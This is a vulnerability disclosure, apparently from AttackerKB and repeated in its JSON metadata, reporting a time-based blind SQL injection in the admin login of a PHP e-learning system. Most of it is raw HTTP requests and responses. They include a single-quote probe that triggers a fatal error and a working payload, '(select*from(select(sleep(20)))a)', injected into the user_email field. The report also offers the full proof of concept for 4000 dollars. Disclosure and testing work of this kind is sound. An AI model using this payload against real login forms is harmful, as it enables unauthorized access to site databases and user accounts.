Description
## Description:
The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind.
A single quote was submitted in the user_email parameter, and a general error message was returned.
Two single quotes were then submitted and the error message disappeared.
**Recent assessments:**
**nu11secur1ty** at October 18, 2021 2:08pm UTC reported:
## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>)
## [Vendor](<https://www.sourcecodester.com/user/51695/activity>)

## MySQL Request-1:
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
## MySQL Response-1:
Response 1
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...
* * *
## MySQL Request-2:
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
## MySQL Response-2
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
## MySQL Request-3
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
## MySQL Response-3
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
## Price for decrypting of the PoC:
4000$
## Reproduce
[href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>)
## Proof:
[href](<https://streamable.com/f5tk43>)
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
{"id": "AKB:0B4D3ED3-FC04-45FE-B2D9-5E91FC41FAD2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-nu11-101821", "description": "## Description:\n\nThe user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind. \nA single quote was submitted in the user_email parameter, and a general error message was returned. \nTwo single quotes were then submitted and the error message disappeared.\n\n \n**Recent assessments:** \n \n**nu11secur1ty** at October 18, 2021 2:08pm UTC reported:\n\n## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>)\n\n## [Vendor](<https://www.sourcecodester.com/user/51695/activity>)\n\n\n\n## MySQL Request-1:\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-1:\n \n \n Response 1\n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:37 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 7099\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n <!-- Bootstrap core CSS -->\n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n <b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\\xampp\\htdocs\\caiwl\\include\\accounts.php:28\n Stack trace:\n #0 C:\\xampp\\htdocs\\caiwl\\admin\\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')\n #1 {main}\n thrown in <b>\n ...[SNIP]...\n \n\n* * *\n\n## MySQL Request-2:\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-2\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:40 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 6832\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n <!-- Bootstrap core CSS -->\n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n \n\n## MySQL Request-3\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-3\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:51 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 6811\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n <!-- Bootstrap core CSS -->\n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n \n\n## Price for decrypting of the PoC:\n \n \n 4000$\n \n\n## Reproduce\n\n[href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>)\n\n## Proof:\n\n[href](<https://streamable.com/f5tk43>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2021-10-18T00:00:00", "modified": "2021-10-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/comments/317e73ba-fb04-49ff-8bf3-13feeb737102", "reporter": "AttackerKB", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-18T16:41:59", "viewCount": 8, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": ["easy_to_develop", "high_privilege_access", "default_configuration"], "mitre_vector": {"Execution": ["Command and Scripting Interpreter: Python(Validated)", "Exploitation for Client Execution(Validated)"]}, "last_activity": "2021-10-18T14:34:00", "_state": {"wildexploited": 1647356733, "dependencies": 1646365306}, "_internal": {"wildexploited_cvelist": null}}
{}